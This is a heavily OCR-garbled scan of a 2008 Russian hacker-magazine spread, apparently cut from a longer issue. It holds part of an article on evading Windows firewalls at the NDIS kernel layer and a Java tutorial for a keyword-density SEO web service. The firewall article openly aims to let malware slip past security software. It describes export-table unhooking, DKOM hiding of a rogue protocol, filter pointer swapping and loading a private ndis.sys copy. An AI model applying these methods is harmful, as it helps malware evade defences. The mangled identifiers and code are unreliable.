из М0І5_РП0Т0С0І__СНАВАСТЕРІ5ТІС5, а из Ы0І5_0РЕМ_ 
ВЕОСК. Последний способ применяется так — при вызове 
ЫсІівОрепАсІарІегО устанавливается хукуказателя на код 
(РЫ 0І5_0РЕМ_ВЮСК)*МсІІ5Віпс1іпдНапс11е, что в дальней- 
шем позволит перехватывать обработчики самых важных 
функций — 5епбНапсІІег, ВепсІРаскеІъНапсІІег и др. 

Какуже было сказано, в структуре ЫВІ5_0РЕМ_ВЕ0СК 
(которая, повторю, создается при вызове ЫсІ ізОрепАсІарЕегО) 
содержатся указатели на обработчики конкретного сетевого 
адаптера, связанного с протоколом. С каждым протоколом 
может быть связано несколько адаптеров, открытые блоки 
которых объединяются в связный список. Ауказатель 
на первую структуру Ы0І5_0РЕЫ_ВЕ0СК содержится в 
N О І5_РР0Т0С0Е_ВЕ0СК. ОрепВІоск. 



ЫБ 135 0_РКОТОС ОБ_СНАКАС ТЕК I 3 Т I С 3 



РгоЕосоІСІіагасЕегізЕісз ; 

зЕгисЕ _ЫБІЗ_РКОТОСОЬ_ВЬОСК * ЫехЕ ; 

ЦЪОШ МахРаЕ Е егпЗ і 2 е ; 

} ШІЗ_РКОТОСОЬ_ВЬОСК, 

* РЫБ 1 3_РКОТОСОЬ_ВЬОСК ; 

Эта структура не документирована и отличается в разных 
версиях ѴѴіпсІоѵѵз. Поле ЕепдіЬ содержит длину структуры 
Ы0І5_РР0Т0С0Е_ВЕ0СК. РгоІосоІСЬагасІегізбсз — это 
структура адресов обработчиков. Реіагепсе содержит спин- 
локи для работы с ОрепВІоск, ну а сам ОрепВІоск — адреса 
открытых обработчиков. 

Для того чтобы иметь возможность перехвата всех зарегист- 
рированных N015 протоколов, нужно найти первый элемент 
в ЫсІ ізРгоЕосоІЕізЕ. Этотсписок возвращается после вызова 
функции ЫсіізПедізІегРгоІюсоіО в виде хендла N О І5_ 
НАЫОЕЕ. Он являет собой связный реестр Ы0І5-протоколов, 
представляемых структурой Ы0І5_РР0Т0С0Е_ВЕ0СК. Они 
экспортируют свои функции-обработчики, вызываемые при 
каких-то событиях, например, при связывании адаптера и 
протокола, при принятии и удалении пакета и т.д. 

В случае регистрации/удаления протокола используется 
указатель на первый протокол в списке (если не запущен 
снифер или другие программы, работающие на уровне N015, 
то это будет протокол ТСРIР_VVАNАНР). 

В ядре существует переменная модуля N015. 5У5 — 
псі ізРгоЕосоЮізЕ. которая указывает на последний зарегис- 
трированный протокол (соответственно, первый в списке). 
Сейчас я тебя обрадую — эта переменная не экспортирует- 
ся. Указатель на последний зарегистрированный протокол 
можно получить так: регистрируем пустой протокол, при 
регистрации получаем указатель на следующий протокол 
в цепочке и сразу его удаляем. Полученный после регис- 
трации протокола N^I5_НАN^^Е будет указателем на со- 
зданную нами структуру N^I5_РР0Т0С0^_В^0СК, которая, 
ксожалению, отличается от одной версии N015 кдругой и 
не всегда встречается в псііз.б. Структура, помимо прочего, 
содержит в себе N^I5_РВ0Т0С0^_СНАВАСТЕРI5ТIС5 с 
адресами всех РгоіосоІХХХ функций и список N^I5_0РЕN_ 
ВЕОСК, который, в свою очередь, содержит обработчики 
ВепсІ/ВепсІРаскеІз/РедиезД) всех сетевых интерфейсов, 
открытых данным протоколом, и указатель на следующую 
структуру N^I5_РВ0Т0С0^_В^0СК. Двигаясь по списку 
зарегистрированных протоколов, переписываем интересу- 
ющие нас обработчики. 

Файры при установке хуков проверяют зарегистриро- 
ванные в системе протоколы, после чего путем патчинга 
N^I5_РН0Т0С0^_СНАНАСТЕРI5ТIС5 подменяют адреса 



г В ЯДРЕ ВЫЖИВАЕТ ТОТ, КТО УМНЕЕ 

Так как бороться с файрволами? Бороться с этим явлением 
сложно, хотя и возможно ;). В основе обхода файрволов ле- 
життотфакт, что в ядре ѴѴіпсІоѵѵз все равны. А для реализа- 
ции реального превосходства одной программы над другой 
нужны повышенные привилегии — файр должен обладать 
такими полномочиями, которые не может получить малварь. 
Впрочем, не стоит те шить себя напрасными надеждами. 
Разработчики файрволов пряники едят не даром и нема- 
ленькую зарплату в зеленых американских рублях получают 
заслуженно. Ну, или почти заслуженно. Такие избитые вещи, 
как инжект кода в доверенный процесс или манипуляции 
с выгрузкой драйвера файра (или еще хлеще — убийс- 
тво процесса файра) рассматривать не будем. Себя надо 
уважать. И первое, и второе есть всего лишь обман файра и 
свидетельство некомпетентности разработчика (тем более, 
что все современные софтины это дело палят— Прим. ред.). 
Мы будем сражаться честно, лицом к лицу и с открытым 
забралом. 

г ПРИСТУПИМ-С... 

На данный момент мне известны следующие способы обхо- 
да файрволов в ядре (претендовать на исключительность 
не буду): 

1) Первое, что должно прийти на ум — восстановить таблицу 
экспорта псііз.зуз.тем самым убрав установленные хуки с глав- 
ных функций ШізНедіз{егРго1:осоІ()/ Nс^І5^егедІ51;егРгоЕосо^(), 
ШізОрепАсІарІегО^сІізСІозеАсІарІюгО и вызвав эти функции 
для регистрации нового «тайного» протокола. Протокол, 
конечно же, будет существовать в переменной псіізРгоЕосоіЕізі: 
и N^I5_РР0Т0С0^_В^0СК, но файр пропуститего регистра- 
цию и привязку сетевого адаптера. Данная техника сильна, но 
ненадежна, поскольку хорошо реализованные файры следят 
за целостностью установленных хуков и восстанавливают их 
через определенную единицу времени. Далее при помощи 
техники ОКОМ — ОігесЕ кегпеі оЬ|'ес1: тапіриіабоп (мы об этом 
уже писали) — следуетубрать из N^I5_РП0Т0С0^_В^0СК 
зарегистрированный нами протокол, ведь по сути N О І5_ 
РР0Т0С0Е_ВЕ0СК представляет собой простой линкованный 
список. Какего найти — описано выше. 

2) Как некий подвид вышеприведенного метода мож- 
но нафантазировать и такое: путем патчинга функций 
N615^^1516^™^©!]) и NсIІ50репАсIар^ег() осущест- 
вить замену всех ссылок и указателей на переменную 
псіізРгоЕосоіЕізЕ референсами — на некую поддельную 
переменную, которую мы сами и создадим. Трудность втом, 
что затем придется ручками перехватывать вызов функций 
псііз.зуз, использующих эту переменную: 




> Ііпкз 



Если хочешь ра- 
зобраться с темой 
статьи подробнее, 
обязательны к по- 
сещен и ю ууазттш, 
гооікіЕсот , рсаиза 
сот и ѵѵіпрсар.огд . 




> СІѴСІ 

На дискеты можешь 
найти исходники и 
откоп мил и ро ванный 
вариант драйвера, 
который ставит хуки 
на некоторые N015 
функции путем патча 
таблицы экспорта. 
Для его компиляции 
тебе понадобится 
Огіѵег Оеѵеіортепі: 
КіЕ 
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— ШізКедізбегРгобосоІ ( ) и ЩізБегедізбегРгобосоІ ( ) 

— ЫсіізВебегпесеРгоСосоІВуЫате ( ) ЫдізБегебегепсеРгобос 
о1() 

— ШізРпРРізраЬсЬ. ( ) 

— ШізСЬескАсіарЬегВігкііпдз ( ) 

3) При вызове N с) і зО ре п АсІ а р!;е г( ) происходит обновление базы 
данных фильтров минипорта, которые определяются соответствую- 
щими структурами в ѴѴ2 К\ѴѴі пХр — ЕТН_РІІ_ТЕР\Х_ЕІІ_ТЕР. Дальней- 
ший вызов неэкспортируемых функций ХЫо1:еРі11;ег0репАсІар1:ег() и 
ЕіЬ N оіе Рі НегАсІа р1;е г() присоединяет к базе данных фильтров мини- 
порта структуры ЕТН В I N О I N 01 N Р0/Х_В I N О I N 0_І N РО , а уже в них 
(ты не поверишь!) хранится указатель на список М0І5_0РЕМ_ВІ_0СК, 
который хранит обработчики функций для текущего минипорта (смот- 
ри описание ниже). 

Структуры, которые ты можешь увидеть на соответствующих блок- 
врезках, в ѴѴіпсіоѵѵз изменяются от билда к билду, поэтому стопро- 
центно полагаться на мое описание я бы не советовал (оно, кстати, 
подходит к ѵѵі п 2 к) . 

4) Как известно, при обработке сетевого пакета менеджеры паке- 

тов используютуказатель ЕТН РІ ЕТЕР.Ореп Еізі для получения всех 
открытых обработчиков, привязанных к да иному сетевому адапте- 
ру/минипорту. А что нам мешает перехватить ЕТН РІ ЬТЕ В . О ре п Ьі зі: 

путем создания собственной структуры ЕТНВ I N О I N 0_І N РО , где 

и подменить указателя структуры ОрепЕізІ на свой собственный? 
Подумай над этим на досуге... Метод супер! Его сложно выявить, 
поскольку все, что нужно сделать — это перезаписать один указатель 
на подставную структуру ЕТН В I N О I N 0_І N РО — и дело почти в шляпе. 
Сложность реализации в том, что функции, которые регистрируют и 
ассоциируют структуры ЕТНВ I N О I N 01 N РО с конкретным минипор- 
том ХЫо1:еРіиег0репАсІар1:ег() и Е^бЫоІеРіиегАсІар^егО, не докумен- 
тированы и не экспортируются. Выход, который можно использовать 
— поиск этих функций по сигнатуре в памяти и патч чем-нибудь в духе 
ЛѵіР/САи_ на свой собственный обработчик. 

5) Н аконец, способ для любителей решать проблемы через анальное от- 
верстие: загрузить псііз.зуз при помощи своего собственного РЕ-лоаде- 
ра, промаппить секции загруженного имиджа псііз.зуз в соответствующие 
виртуальные адреса в неподкачиваемой памяти (при этом все абсолют- 



Недокументирован- 
ная структура 

Жшшш.жо 

буре сіе б збгисб _ЕТН_ВІЫБІШ_ІНГО 
{ 

ЫБІЗ_НАШЬЕ МасВіпйіпдНапйІе; 

N01 3_НАЫБЬЕ ШізВіпйіпдСогЩехІ:; 

ШЖГ РаскебРіІбегз ; 

ІІЬОШ Вебегепсез; 

ВООЬЕАИ ВесеіѵесІАРаскеб ; 

ІІСНАВ Еіібегіпсіех; 

збгисб _ЕТН_ВШОШС_ШРО *ЫехбОреп; 

ІЛЫТ ОІсІРаскебРіІбегз ; 

збгисб _ЕТН_ВШОШС_ШРО *ЫехРОігесбе(і; 
збгисб _ЕТН_ВШБІЫС_ШРО *ЫехбВМ; 

} 

ЕТН_ВШБІШ_ШРО , *РЕТН_ВПГОІШ_ШРО; 




ные адреса должны быть переадресованы на уже существующий имидж 
псПз.зуз в памяти), после чего перехватывать и обрабатывать все обра- 
щения к ЫОІЗ-библиотеке. При явных выгодах у метода есть и очевидные 
недостатки — простейший сканер памяти можетлегко обнаружить копию 
псііз.зуз, да и потом дополнительно потребуется писать свой собственный 
РЕ-лоадер. Сначала удостоверься, что йізк 1/0 не хучится антивирусами 
и файрами. С особой осторожностью нужно использовать такие функции, 
как2\л/Сгеа1е5есбоп и МтСгеаІеЗесІіоп. Преимущества этого кодерского 
хинта видны невооруженным глазом: переносимость, 1 00% работающий 
код и скорость исполнения, но уж больно это метод шумный и палевный. 
На мой взгляд, в природе практически не встречается. 
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Связьструктур М0І5_РК0Т0С0І__ВІ_0СКи М0І5_0РЕЫ_ВЮСК 



В принципе, для обеспечения надежного контроля за сетевой актив- 
ностью можно перехватывать все подмножество функций N015 библи- 
отеки, другой вопрос — а оно вам надо? Для достижения своих грязных 
целей достаточно перехватить четыре функции: ЫсІізВедізІегРгоІюсоШ, 
ЫсІізОегедІБІегРгоІосоШ, ЫсІізОрепАсІарІегО и ІЧсІізСІозеАсІарІегО — это 
может реально отразить картину сетевой активности в ядре. 

г А ЧТО ЖЕ с кодингом? 

Сразу оговорюсь, что сорца драйвера, который будет ставить все 
файрволы мира в недвусмысленную позицию (я имею в виду позу 
гордого льва) здесь ты не найдешь. Должен же быть какой-то про- 
стор для фантазии ;). Просто рассмотрим, как в ядре устанавлива- 
ются и снимаются хуки на основные функции псііз.зуз. Для этого 



заранее подготовим обработчик функции, которую собираемся 
похучить, найдем псііз.зуз в ядре и пропарсим та блицу экспорта 
на предмет адреса искомой функции, после чего перезапишем их. 
И все! Весьма основательно откомментированный исходникдан- 
ного действа ожидает тебя на диске, в статью он не попал, так как 
журнальное пространство не предполагает публикации больших 
сорцов. 

Н ЗАКЛЮЧЕНИЕ 

Честно говоря, в природе, кроме хуков функций, из вышенакуренного 
мало что встречается. Разработчики файров не стоят на месте и вы- 
шеописанными способами дело далеко не ограничивается. Но об этом 
как-нибудь в другой раз... Да пребудет с тобой Сила! тг 



Недокументированная структура ЕТН 
РІЬТЕК (она же Х_ЕІЬТЕК) 



СурейеЕ зСгисР _ЕТН_РІЬТЕР 

{ 



РЫВІЗ_ЗРШ_ЬОСК 

СНАР 

ЕТН_МАЗК 

ИШТ 

ЕТН_ВШБШС_ШРО 

ЕТН_АВВРЕ 3 3_СНАИСЕ 

ЕТН_РІЬТЕР_СНАЫСЕ 

ЕТН_ВЕРЕРРЕВ_СЬОЗЕ 

ІЛЫТ 

ІЛЫТ 

ІЛіОЫС 

ИСНАР 

СНАР 

ЕТН_МАЗК 

ИШТ 

ЕГШТ 

ретн_вшвшс_:шро 

РЕТН_ВШВШС_ШРО 



Ьоск; 

( *Ми1кісазкАс1сІге8 3ез ) [ЕТН_ЬЕЫСТН_ОР_АВВРЕЗЗ] ; 
*ВігнііпдзІІзіпдА(і(ігезз ; 

СотЪіпейРаскеДРіІЕег ; 

*0репЬізк; 

АсМг е з з СЬапд е Ас к і оп ; 

РіІСегСІгапдеАсбіоп; 

СІозеАскіоп; 

МахішшпМиІбісазкАсісігеззез ; 

ИшлЬегОбАсМгеззез ; 

РгееВіпсІіпдМазк ; 

А(іар Д е г Асісіг е з з [ЕТН_ЬЕЫСТН_ОР_АВВВЕЗЗ] ; 

( *0І(ЗМиІРісаз1:А(і(ігеззез ) [ЕТН_ЬЕЫСТН_ОР_АВВРЕЗЗ] ; 
*0І(іВіп(ііпдзизіпдА(ісігезз ; 

ОІсШитЬегОЕАсЗсІгеззез ; 

ОІсЗСотЬіпесіРаскекРіІкег ; 

ВігескейЬізк ; 

ВМЬізк; 



зкгисС _ЫВІЗ_МІЫІРОРТ_ВЬОСК *Міпірог1: ; 



} ЕТН_РІЬТЕР, *РЕТН_РІЬТЕР; 
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НИКОЛАЙ БАЙБОРОДИН 
и ВАІВ0К00Ш@6МАІІ_.С0М / 





5Е0-С0ФТ 




и да о ѵ\ 




ИНСТРУМЕНТЫ ПОИСКОВОЙ ОПТИМИЗАЦИИ свс 


ІИМИ РУКАМИ 







оисковая оптимизация — один из наибо лее доходных сетевых бизнесов 
Однако чудес не бывает, и для того, чтобы начаыТпш^ча^^юыыажо^^Т і 
доход, нужно приложить немало уси лий, ц целью облегчения каторжного 

труда оптимизатора разработан специальный^ - 

ІЯ — 

тизировать многие рутинные операции. Но в 



позволяющий автома 




софт 



олынинстве случаев такой | 

_ ■ ■ 1 1 ■ I — ^1_Г \ 

стоит немалых денег. Однако не боги горшки обжигают, и кое-что ты 





НЕМНОГО ТЕ0РИИ5Е0 

І авай для начала отбросим всю шелуху и заглянем в самую суть поис- 
ковой оптимизации. Ее основная цель — сделать веб-сайт видимым для 
поисковой системы и вывести на верхние позиции в результатах поиска 
по тем или иным запросам. Оставим на некоторое время алгоритмы ра- 
боты поисковых систем в стороне и посмотрим на задачу более широко. 
Представь, что по пути из пивного ларька домой ктебе подбежал какой-то 
баклан в зеленом жилете и вручил бумажный листок странного вида. Бег- 
ло пробежав его глазами, ты понимаешь, что это очередная рекламная 
замануха от расположенного в соседнем квартале магазина «Колорадо». 
Внимание, вопрос: на основании чего ты квалифицировал этоттекст 
именнотаким образом? Правильный ответ: на основании определенных 
слов и словосочетаний, встреченныхтобой в тексте. Допустим, это будут 
слова «скидки», «сЫпа», «лох», «кредит», «лучшая цена». 

Теперь возьмем этотже набор слов и в случайном порядке вставим их 
в произвольно выбранные места моей любимой книги «Война и мир». 
Легким движением руки мы превратили бессмертное произведение в 
рекламу магазина, продающего всякий трэш. Но не так-то просто выма- 
рать классиков! После эксперимента по скрещиванию «Войны и мира» с 
рекламным мусором Наташа Ростова не стала кассиром-операционистом 
№6. Мы по-прежнему имеем легко узнаваемое произведение, в котором 
иногда встречаются странные баги в виде слов «скидки», «Колорадо» 
и т.д. Что произошло со словесной диареей маркетологов? Почему мы 
теперь не воспринимаем ее кактаковую? Ответочевиден — она просто 
растворилась в огромном объеме другой информации. Исходя их этого, 
можно сделать ценные выводы. 

Во-первых, в любом осмысленном тексте есть определенные ключевые 
слова, по которым можно определить его контекстное поле (то есть его 
основную тематику). Во-вторых, для того чтобы это контекстное поле было 
определено верно, необходимо, чтобы частота появления этих ключевых 
слов втексте была не меньше определенного уровня. 

Для определения тематики текста поисковыми системами используются 



специальные математические алгоритмы, которые держатся в строжай- 
шем секрете, однако все они основаны на частотном анализе стеми или 
иными дополнениями. Таким образом, если веб-мастер желает срубить 
бабок на адалт-партнерке, переправляя туда трафик пользователей сети, 
интересующихся размножением сусликов в неволе, он должен таким об- 
разом организовать контекст своего сайта, чтобы последний однозначно 
идентифицировался поисковиками как сусликовый вертеп. Для этого 
ему придется определить ключевые слова, проанализировать, с какой 
частотой они встречаются на страницах сайта, и в случае недостаточно 
высокого показателя частоты внести соответствующие коррективы (при 
этом важно не перестараться, так как за поисковый спам легко зарабо- 
тать бан на веки вечные). 

Постепенно переходим от скучной теории к практике. Как считать частоту 
ключевых слов (или их плотность, втерминологии 5Е0)? Этот показатель 
рассчитывается как отношение количества повторов ключевого слова в 
текстовом фрагменте определенного объема к общему количеству слов 
в этом фрагменте. Чаще всего плотность ключевых слов (кеуѵѵогб ѵѵеідЫ:) 
рассчитывается для всей страницы или для всего сайта. В данном случае 
говорят уже не о плотности, а о частоте (кеуѵѵогсі Ітециепсу). Задача ясна. 
Требуется, получив от пользователя кейворд, посчитать, сколько раз он 
встречается на странице, и разделить это число на общее количество 
слов на странице. Все просто. Но не спеши бежать за пивом — мозги тебе 
сегодня еще понадобятся, так как в этом незамысловатом алгоритме есть 
важные нюансы, которые мы обкурим по ходу дела. 

Н І.ЕТ’5 МѴ РЕОРЬЕ 60 

Приступим к написанию нашего первого 5Е0- инструмента. Для 
начала определимся с платформой. Из двух возможных альтернатив 
— традиционное оконное приложение и веб- приложение — пред- 
лагаю остановиться на последнем варианте. А для большей его 
гибкости и универсальности оформим все это в виде веб-сервиса. 

В качестве инструмента предлагаю использовать язык программи- 



► 114 



ХАКЕР 03 /1 11/ 08 










НАІЛЕСОІГШКЕ 




рования баѵа и ЮЕ ЫеіВеапз (хотя последнее, как говорится, на 
любителя, кто-то предпочитает Есіірзе). 

Пораскинув мозгами, ты можешь прийти к выводу, что приложение 
должно включать в себя следующие функциональные модули: веб-сер- 
вис, механизм получения содержимого гипертекстового документа и 
парсер, выполняющий основную работу по расчету плотности заданного 
ключевого слова. 

Начнем с наименее ответственной части работы — создадим каркас 
приложения в виде веб-сервиса. Запускай среду разработки и открывай 
диалогсоздания нового проекта. В списке категорий выбирай ѵѵеЬ-про- 
ект и необходимый шаблон в правой части окна. В данном случае это 
будет ѴѴеЬ Арріісабоп. 

На описании шагов мастера останавливаться я не буду — там ничего 
сложного нет. Отмечу только, что на последнем этапе тебе будет любезно 
предложено выбрать фреймворк для создания пользовательского интер- 
фейса. Но поскольку нас сейчас интересуеттолько логика приложения, 
здесь можно ничего не выбирать, тем самым избавившись от ненужного 
балласта в виде неиспользуемого программного кода. 

После того как шаблон будетуспешно загружен в редактор, создадим 
пакет, в котором будут храниться все наши основные классы. Назовем его 
огд.кѵѵбсоге (смотри рисунок). 

Теперь в только что созданном пакете нужно разместить основной класс 
приложения. Что он должен уметь делать? Во-первых, соединяться с 
указанным в качестве параметра веб-узлом и забирать с него необходи- 
мый НТМЕ-документ. Во-вторых, получив еще один параметр (кейворд), 
рассчитывать его частоту или плотность. Забирать документ с указанного 
ресурса мы будем в конструкторе класса, а парсить его — в отдельном ме- 
тоде. Назовем этот метод рагзе. Кстати, он должен возвращать в качестве 
значения уже рассчитанный для заданного ключевого слова показатель 
его частоты. Если перевести все вышесказанное на нормальный челове- 
ческий язык, то получится следующее: 

раскаде огд . кмб . соге; 

сіазз Рагзег{ 

ргіѵаЕе ЗЕгіпд ЕехЕ; 
ргіѵаЕе іпЕ бгед; 

Рагзег ( ЗЕг іпд ѵаі ) { } 
риЫіс іпЕ рагзе( ЗЕгіпд ѵаі) { 
геЕигп 0; 

} 

} 

Класс готов. Создаем сервис, который будет предоставлять к нему доступ 
веб-пользователей. Для этого в контекстном меню корневого узла про- 
екта выбираем «Ыеѵѵ ѴѴеЬ Зегѵісе». В окне мастера нужно указать имя, 
которое будет присвоено сервису (например, КѵЛѴѴз), и пакет, в котором 
будет находиться его основной класс (например, огд.кѵѵбѵѵз). 

После того как сервис создан, не мешало бы придать ему смысла 
(пока что он пуст, как твои пивные бутылки). Для этого можно вос- 
пользоваться как традиционным редактором кода, так и архитек- 
тором веб-сервисов, появившимся в шестой версии ЫеіВеапз и 



позволяющим визуально представить структуру и программную 
логику проектируемого веб-сервиса. 

Чтобы объяснить веб-сервису, что от него требуется, жми кнопку Абб 
Орегабоп. В окне свойств операции нужно будет ввести ее имя (у меня 
это соипі), а также указать передаваемые функции параметры. В каче- 
стве параметров будущий сервис будет принимать ЕІВЕанализируемой 
страницы и ключевое слово, частота которого будет анализироваться. 
Для этого создадим две строковые переменные — игі и ѵѵогб. 

Что дальше? А дальше мы будем ручками править программный код, 
созданный средой разработки. Зачем? Азатем, чтобы подружить его с 
созданным ранее классом — надеюсь, ты про него еще не забыл. Пере- 
ключайся на редактор программного кода веб-сервиса и ищи модуль, 
начинающийся со строки «ЙѴѴеЬМеіЬобЬрегабопЫате = «соипЫ». 
Именно здесь вместо строки «//ТО 00 ѵѵгкеуоиг ітріетепіабоп собе 
беге» мы создадим экземпляр класса Рагзег, передадим ему необхо- 
димые параметры и получим ответ, возвращаемый методом класса. 
Подробности смотри во врезке. 

раскаде огд . кмб . \ѵз ; 
ітрогЕ б аѵах . б \ѵз . МеЪМеЕЪоб. ; 
ітрогЕ б аѵах . б ѵ/з . МеЪРагат ; 
ітрогЕ б аѵах. бѵ/з .МеЬЗегѵісе; 
ітрогЕ огд . къѵб . соге . Рагзег ; 

ШеЬЗегѵісе ( ) 
риЫіс сіазз Кѵ/бМз { 

©МеЪМеЕЬосі (орегаЕіопЫате = "соипЕ") 
риЫіс ЗЕгіпд соипЕ (ШеЬРагат (пате = "игі") 

ЗЕгіпд игі , @МеЪРагат (пате = "ѵгогсі") 

ЗЕгіпд ѵгогсі) { 

Рагзег рзг = пеѵ; Рагзег (игі) ; 
іпЕ соипЕ = рзг .рагзе (ѵгогсі) ; 

ЗЕгіпд соипЕЗЕг - "Ргесдиепсе об " + ѵгогсі + " із " + соипЕ; 
геЕигп соипЕЗЕг; 

} 

} 

По идее, это уже готовое веб- приложение с сервисно-ориентированной 
архитектурой (вау! клево-то как!). И хотя оно по-прежнему еще ни на что 
не способно, его уже можно (и нужно) тестировать, чтобы, как говорит мой 
знакомый боцман, оставив якоря, долги и плачущихженщин, отправить- 
ся вперед за горизонт, то есть приступить к разработке функционального 
ядра приложения. 

Для того чтобы проверить работоспособность веб-сервиса, найди его 
в древовидном списке проводника проектов и через контекстное меню 
выбери опцию Тезі ѴѴеЬ Зегѵісе. Да, не забудь предварительно стартануть 
сервер приложений и развернуть на нем свой проект (проще всего это 
сделать непосредственно из ЮЕ с помощью команды Рип). Перед тобой 
любезно распахнется окно веб-браузера, содержащее форму для ввода 
параметров, передаваемых веб-сервису, и ссылку на ѴѴ50Е-файл. 

После отправки сервису любых двух строковых параметров он должен 
дать адекватный ответ, проигнорировав параметр, отвечающий за ука- 
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^ оосііпд 

ГіТ — 




Структура веб-сервиса 



Создание веб-проекта в ЮЕ ЫеіВеапз 




> Ііпкз 



ѵѵѵѵѵѵ.зеагсИепдіпез.ги 

— лучшие рекомен- 
дации поисковых 
оптимизаторов. Міі5І 
геасі! 

теіа.таіН.зрЬи.ги/ 
%7ЕідогЛИезіз/посіе1 . 
Мті— математи- 
ческое описание 
моделей информа- 
ционного поиска. 




Традиции мы уважа- 
ем. Согласно нашей 
давней традиции, на 
дискеты найдешь 
примеры исходни- 
ков как веб-сервиса, 
так и его клиента. 



зание ІШІ_ и сообщающий, что частота искомого ключевого 
слова равна нулю. 

г ГРАБИМ НТМІ_ 

Для того чтобы произвести вычисление частоты исполь- 
зования определенного ключевого слова на той или иной 
странице, эту страницу для начала нужно получить и прочи- 
тать. Этим мы сейчас и займемся, мой бледнолицый друг! 
Создавая класс Рагзег, мы, какты помнишь, предусмотрели 
в нем конструктор, который должен получать веб-страницу с 
указанным 1)ВІ_. Пока он пуст, следовательно, пора над ним 
серьезно поработать. 

Средствами Заѵа загрузка веб-страницы реализуется не 
просто, а очень просто. Буквально, на счет два. Следи за 
руками. 

Делаем раз — преобразовываем строковый параметр, 
содержащий адрес страницы, в объект ІШІ_: 

ШЬ гезЭгІ = пеѵі ШЬ(Збгіпд) 

Делаем два — получаем НТМІ_-документ: 

Збгіпд сіос = сІоѵтІоасІРаде (гезШгІ ) 

Здесь боѵѵпІоасІРадеО — простейшая функция, на написа- 
ние которой у меня ушло не более минуты: 

ргіѵабе Збгіпд сІоѵтІоасІРаде (ШЬ ѵаі) { 
бгу{ 

ВиббегесІКеасіег геасіег = пеѵѵ ВиббегесІКеасІег ( 
пехѵ ІприбЗбгеатКеасіег (ѵаі . орепЗбгеат( ) ) ) ; 
Збгіпд Ііпе; 

ЗбгіпдВиббег радеВиббег = пем ЗбгіпдВиббег ( ) ; 
ѵЛііІе ( (Ііпе = геасіег . геасіьіпе ( ) ) ! = пиіі ) { 
радеВиббег . аррепсі (Ііпе) ; 

> 

гебигп радеВиббег . боЗбгіпд ( ) ; 

} 

сабсЪ. (Ехсербіоп е) {} 
гебигп пиіі; 

} 



Нелишним будетеще раз проверить работоспособность веб- 
сервиса. Для этого, запустив тест, вбивай в соответствующее 
поле реально существующий и доступный в данный момент 
ствоей машины 1)РІ_. Сервисдолжен молча проглотить за- 
прос. Если же он выплюнул страницу с громадным списком 
ошибок, значит ты где-то лопухнулся (читай еще раз или 
смотри пример на нашем диске]. 

^ РАЗ СЛОВЕЧКО, ДВА СЛОВЕЧКО, 

ИЛИ ПАРСИНГ НТМІ. 

Наш пациентуспешно помещен на операционный стол 
(читай: удаленный документ преобразован в локальную 
строковую переменную) и можно приступать к вскрытию, то 
есть к парсингу. Другими словами, пишем код для метода 
рагзе. С этой задачей справится даже Ігие етодігі. 

Суть работы состоит в разборе имеющейся строки на 
отдельные лексемы (или, по-нашему, слова). Для этого в 
арсенале Заѵа имеется такой замечательный класс, как 
ЗігіпдТокепііег. Его конструктор выглядит следующим 
образом: 

ЗбгіпдТокепігег зб = пеѵ*/ 

ЗбгіпдТокепігег ( збгіпд , бешрі) 

Здесь вігіпд — строка, подлежащая разбору, а Іетрі — набор 
символов, используемых для отделения одного слова от 
другого. То есть этот набор должен представлять собой что-то 
вроде «,!\"\п;:|.?-()#0$%1 234567890"»... ©'\гѴ — <>/+={}_:&». 
Для того чтобы создать наиболее эффективный шаблон, 
можно организоватьтестовый вывод массива токенов на 
консоль и отслеживать появление нежелательных символов 
с последующим их добавлением к шаблону. Для извлечения 
токенов из объекта ЗігіпдТокепііег используется цикл: 

ѵгііііе ( зб . казМогеЕІешепбз ( ) ) 
зб . пехбТокеп ( ) ; 

Итак, разбираем строку на отдельные токены и в цикле 
сравниваем каждый токен с нашим кейвордом, попутно под- 
считывая количествотокенов. По окончанию цикла делим 
первое значение на второе и делаем ретурн юзеру. 



Думаю, идею ты уловил. Если так, то при создании реального 
приложения я бы тебе еще посоветовал организовать про- 
верку корректности обрабатываемой строки при инициали- 
зации объекта 6ІПІ_ на предмет соответствия стандарту веб- 
адресации. И на всякий случай (для тех, кто в танке) поясню, 
что этот код мы вставляем в конструктор класса Рагзег. 



ѵйіііе (зб .казМогеЕІешепбз ( ) ) { 

СОШ16А11++ ; 

іб (бехб .ѵаі . едиаІзІдпогеСазе ( 
зб . пехбТокеп ( ) ) ) соипб++ ; 

} 

біоаб бгед = соипб/соипбАІІ ; 



► іі6 
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Думаю, самое время поговорить о некоторых подводных камнях, о 
которыхты просто обязан знать, иначе весьтвой частотный анализ не 
будет стоить и «стакана семочек». Начнем с того, что парсер в том виде, 
в котором он представлен, не осуществляет фильтрацию НТМІ_-тэгов, 
наряду с основным текстом учитывающихся при подсчете токенов. 
Следовательно, перед разбором строки неплохо было бы вырезать из 
нее все последовательности <*>, более того, не забывай, что некоторые 
фрагменты документа, заключенные в парный тэг, тебе тоже совершенно 
не нужны (например, веб-формы]. 

Но и это еще не все. Если слить все токены в консоль и внимательно их 
проанализировать, для большей убедительности подсчитав частоту 
появления каждого токена, то легко заметить, что в любом тексте чаще 
всего встречается такой хлам, как разнообразные предлоги, местоиме- 
ния и прочая ерунда, которую, как подсказываетздравый смысл, не надо 
учитывать при подсчетах. Такого рода, с позволения сказать, слова имеют 
специальное название — «стоп-слова». И если уж ты собрался писать 
серьезные 5Е0-приложения, то этот факт обязательно надо учитывать. 
Например, включить в приложение словарик стоп-слов и на его основа- 
нии организовать еще один уровень фильтрации. 

Нет предела совершенству, камрад. И наш простой анализатор плотности 
кейвордов можно совершенствовать до бесконечности. Воттебе еще одна 
идейка (сегодня я добрый). Смысл ее в следующем. Любой язык обладает 
так называемым семантическим ядром, то есть набором слов, использу- 
емых в абсолютном большинстве текстов самой разнообразной темати- 
ческой направленности. Еще один характерный признакслов, входящих 
в семантическое ядро, — это их нейтральная (иногда говорят«нулевая») 
информативность. Большинство поисковых систем при определении 
релевантности документа учитывает семантическое ядро основного для 
документа языка. Следовательно, ты тоже можешь взять на вооружение эту 



технологию и, самостоятельно составив семантическое ядро, автомати- 
чески пропарсив и проанализировав большой объем текстов или взяв уже 
готовое ядро (боодіе тебе в помощь), добавить еще одинуровеньфильтра- 
ции, исключающий слова, входящие в семантическое ядро. 

^ КЛИЕНТ ВСЕГДА ПРАВ 

До этого момента мы занимались созданием веб-сервиса. Однако, для 
того чтобы воспользоваться его возможностями, необходимо наличие со- 
ответствующего клиента. Воттут-тоты можешь в полной мере прочувст- 
вовать своей задн... то есть головой, всю прелесть веб-сервисов. Я имею 
в виду абсолютную свободу в реализации клиента для веб-сервиса. Это 
может быть и оконное, и веб- приложение, созданные с использованием 
